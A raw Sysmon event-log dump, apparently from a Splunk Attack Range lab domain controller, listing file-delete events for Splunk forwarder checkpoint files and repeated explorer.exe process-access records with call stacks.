Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91FA8D7E12062925582A823A3B1A9F66,SHA256=8ACD28FB69651B7D52627E3AE40FDDA8B24EC8D94DE2BC18A682301E279DD069,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:27.137{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A5B2C64A1ADF6A3CEBFF4C8ABBA0CCF,SHA256=68821859435CF810AEC1C25A258C8A734312A8F1628F48EDCA84823A1FAFF1F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:28.371{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B67ACF66B3EEF964A97BC55E786E7AC9,SHA256=ECFE74595AC46CB344E78A1B6082A009047999A27102485377F83760ACD5DFCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.934{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85E5882D458C43A4FF0BF81BA0C20E0B,SHA256=AAAC56F1E97E820A33A178CE73A7F00DF949D173FF68D0CEDF90681B90242952,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.684{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DCC1F46A4F782134F5EA422A7129D6F,SHA256=8F50C4C62458CAF4157AFD2C3BE01E807AE93F70AB62F24DB5B5DEBD90E90AB5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 